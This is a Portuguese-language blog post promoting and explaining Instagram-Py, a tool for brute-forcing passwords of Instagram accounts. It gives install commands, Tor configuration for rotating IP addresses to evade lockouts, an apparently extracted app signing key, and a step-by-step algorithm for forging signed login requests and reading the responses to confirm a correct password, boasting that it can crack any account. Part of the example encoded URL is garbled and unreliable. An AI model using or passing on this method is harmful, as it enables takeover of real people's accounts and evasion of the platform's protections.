O Instagram-py realiza um ataque de força bruta liso no Instagram sem qualquer tipo de limitação de senha e também retoma seu ataque com facilidade.
VERIFICADOR DE VIRUS
LINKS PARA DOWNLOAD
Por quê?
Na verdade comecei este projeto para uma prova de conceito de que podemos usar Instagram de força bruta para sempre.
Quando criei o protótipo e postei no Twitter , muitas pessoas queriam uma ferramenta simples e inteligente para executar
ataque de força bruta no Instagram , então pensei por que reinventar a roda?….
Então eu pesquisei no Github e não encontrei nada de valor, alguns eram falsos ou mal projetados!
E aqui está uma ferramenta autêntica de força bruta para Instagram
Como?
Usamos, tor para mudar nosso ip uma vez bloqueado por muitas tentativas e continuar o ataque.
Uma vez que a API oficial não é um desejo de um hacker, então usamos a assinatura InstagramAPK para permanecer anônimo!
E também salvamos o progresso para que mesmo na interrupção da rede possamos evitar quebrar o computador!
Instagram-Py é um script python simples para realizar ataques básicos de força bruta contra o Instagram ,este script pode ignorar a limitação de login em senhas erradas, portanto, basicamente, ele pode testar um número infinito de senhas .
Instagram-Py está comprovado e pode testar mais de 6 milhões de senhas em uma única conta do instagram com o mínimo de recursos possível.
Este script imita as atividades do aplicativo oficial instagram para Android e envia uma solicitação para que você esteja seguro,mas se a sua instalação tor estiver mal configurada , a culpa recai sobre você.
Dependencias:
python3 , tor , requests , requests[socks] , stem
Certifique-se de ter a versão mais recente do pip (> = 9.0 e python (> = 3.6).
usando pip para obter Instagram-py
você tem que instalar python3-setuptools, atualizar pip
sudo easy_install3 -U pip
sudo pip3 install requests --upgrade
sudo pip3 install requests[socks]
sudo pip3 install stem
sudo pip3 install instagram-py
instagram-py
Agora vamos copiar o arquivo de configuração para o seu disco rígido!
wget -O ~/instapy-config.json "https://git.io/v5DGy"
Configurando Instagram-Py
Abra seu arquivo de configuração encontrado em seu diretório home, este arquivo é muito importante localizado em ~ / instapy-config.json , não mude nada, exceto a configuração
Abra-o com seu editor de texto favorito!
$ vim ~/instapy-config.json
O arquivo de configuração se parece com este:
{ "api-url": "https://i.instagram.com/api/v1/", "user-agent": "Instagram 10.26.0 Android (18 / 4.3; 320dp .....", " ig-sig-key ":" 4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178 ", " ig-sig-version ":" 4 ", " tor ": { " server ":" 127.0.0.1 ", " port ":" 9050 ", " protocol ": "socks5", "control": { "senha": "", "porta": "9051" } } }
api-url : não mude isso a menos que você saiba o que está fazendo
user-agent : não mude isso a menos que você conheça suas coisas
ig-sig_key : nunca altere isso, a menos que seja uma nova versão, ele é extraído do arquivo apk do instagram
tor : mude tudo de acordo com a configuração do seu servidor tor, não bagunce!
Configurando o servidor Tor para abrir a porta de controle
abra seu arquivo de configuração tor geralmente localizado em / etc / tor / torrc
$ sudo vim / etc / tor / torrc
Procure o arquivo para esta seção específica
## A porta na qual o Tor escutará as conexões locais dos aplicativos do controlador do Tor ##, conforme documentado em control-spec.txt. #ControlPort 9051
Descomente 'ControlPort' excluindo o # antes de 'ControlPort', agora salve o arquivo e reinicie seu servidor para
agora você está pronto para quebrar qualquer conta do instagram, certifique-se de que a configuração do tor corresponda a ~ / instapy-config.json
Finalmente , agora você pode usar o instagram-py!
$ instagram-py your_account_username path_to_password_list
Algoritmo:
Instagram-Py usa um algoritmo muito simples para verificar as senhas de forma eficiente, esta seção é dedicada a quem deseja recriar este programa em qualquer outro idioma.
O que nós fazemos
Etapa 1: Obtenha o cookie mágico, que é usado para verificar a integridade do dispositivo!
Obter o magic cookie é o trabalho mais simples, tudo o que precisamos fazer é enviar uma solicitação get para https://i.instagram.com/api/v1/si/fetch_headers/?
challenge_type=signup&guid= , onde o parâmetro guid get é uma string aleatória de 32 caracteres. A string aleatória de 32 caracteres pode ser gerada usando a biblioteca uuid simples do python , para ser v4 específico do UUID . Então, finalmente, só temos que solicitar o url https://i.instagram.com/api/v1/si/fetch_headers/?challenge_type=signup&guid=800e88b931bf491fa3b4a7afa4e679eb e obter o cookie chamado csrftoken , se observarmos o cabeçalho de resposta, poderemos ver que nosso cookie só expira a seguirano no mesmo dia. Então, com isso, só temos que fazer esse pedido uma vez e podemos usá-lo por um ano! Quão vulnerável é isso? ...
Crie uma solicitação de postagem com a assinatura do Instagram.
Esta parte é simples, mas pode ser difícil de configurar, primeiro preciso obter a assinatura do instagram, que só está presente no apk gratuito do Google Play. Lembre-se de que nossa força pode ser nossa fraqueza . Tudo o que preciso fazer é fazer engenharia reversa do apk e encontrar assinatura, vamos chamá-lo de ig_sig .
ig_sig = 4f8732eb9ba7d1c8e8897a75d6474d4eb3f5279137431b2aafb71fafe2abe178
ig_version = 4
O Instagram usa autenticação HMAC para fazer login, então vamos usar a biblioteca hmac do python . Mas primeiro temos que construir nosso corpo, que será codificado em json para que ele realmente assine com ig_sig , então o corpo do post é assim ...
phone_id = <RANDOM 32 CHARACTER STRING SEPERATED WITH - em EQUAL INTERVALS> _csrftoken = <THE MAGIC COOKIE THAT WE GOT!> username = <TARGET ACCOUNT> guid = <RANDOM 32 CHARACTER STRING SEPERATED WITH - em EQUAL INTERVALS> device_id = android- < RANDOM 16 CHARACTER STRING> senha = <SENHA PARA TENTAR> login_attempt_count = 0
O código acima será codificado em JSON . Portanto, para testar a senha, temos que postar os dados neste url https://i.instagram.com/api/v1/accounts/login/ig_sig_key_version=4&signed_body=<SIGNED BODY>. < URL ENCODED JSON DATA> .
<CORPO ASSINADO>: usando HMAC , assine nossos dados codificados em json com ig_sig e retorne um valor hexa.
<URL ENCODED JSON DATA>: os mesmos dados em json mas nós codificamos url para que vá corretamente para insta!
Portanto, para testar uma conta com nome de usuário como NOME DE USUÁRIO e senha com PASSWORD , simplesmente solicitamos este url:
https://i.instagram.com/api/v1/accounts/login/ig_sig_key_version=4&signed_body=bc90e1b7d430f39152e92b4e7d517bfb231dbeid%530ed2071.78c783fb4%76%422c8c3783dcf7phonec72276_phonec % 20% 2232abb45c-f605-4fd7-9b5e-674115516b90% 22% 2C% 20% 22_csrftoken% 22% 3A% 20% 22PyMH2niVQrk41UIBW0lKilleG7GylluQ% 22% 2C% 20% 22username% 22% 2CNOME% 20% 2CER% 22% USERNAME 20% % 22guid% 22% 3A% 20% 2267ca220c-a9eb-4240-b173-2d253808904d% 22% 2C% 20% 22device_id% 22% 3A% 20% 22android-283abce46cb0a0bcef4% 22% 2C% 20% 22password% 22% 3A% 20 % 22PASSWORD% 22% 2C% 20% 22login_attempt_count% 22% 3A% 20% 220% 22% 7D
Veja como eu fiz ...
Com a resposta json e o código de resposta, determinamos que a senha está correta ou errada.
se obtivermos a resposta 200 , o login foi bem-sucedido, mas se obtivermos a resposta 400 , inspecionamos os dados json em busca de pistas se é a senha correta ou solicitação inválida ou muitas tentativas . Portanto, inspecionamos a mensagem da resposta do instagram json!
Mensagem = Desafio necessário , então a senha está correta, mas o instagram tem algumas perguntas, então devemos esperar até que o usuário faça login e responda à pergunta e se tivermos sorte ele não vai mudar a senha e poderemos fazer o login mais tarde (na maioria das vezes as pessoas não mudarão a senha! )
Mensagem = A senha que você digitou está incorreta. , então a senha está incorreta com certeza, tente outra.
Mensagem como algo como palavra inválida nela então , algum outro erro então tente novamente, pode acontecer por causa do erro de codificação da lista de palavras que eu ignorei porque toda a lista mundial tem erro de codificação!
Mensagem = Muitas tentativas , hora de mudar nosso ip e loop, mas não queremos mudar nosso cookie mágico
É isso que você acabou de hackear o instagram com um algoritmo muito simples!
0 Comentário:
Enviar um comentário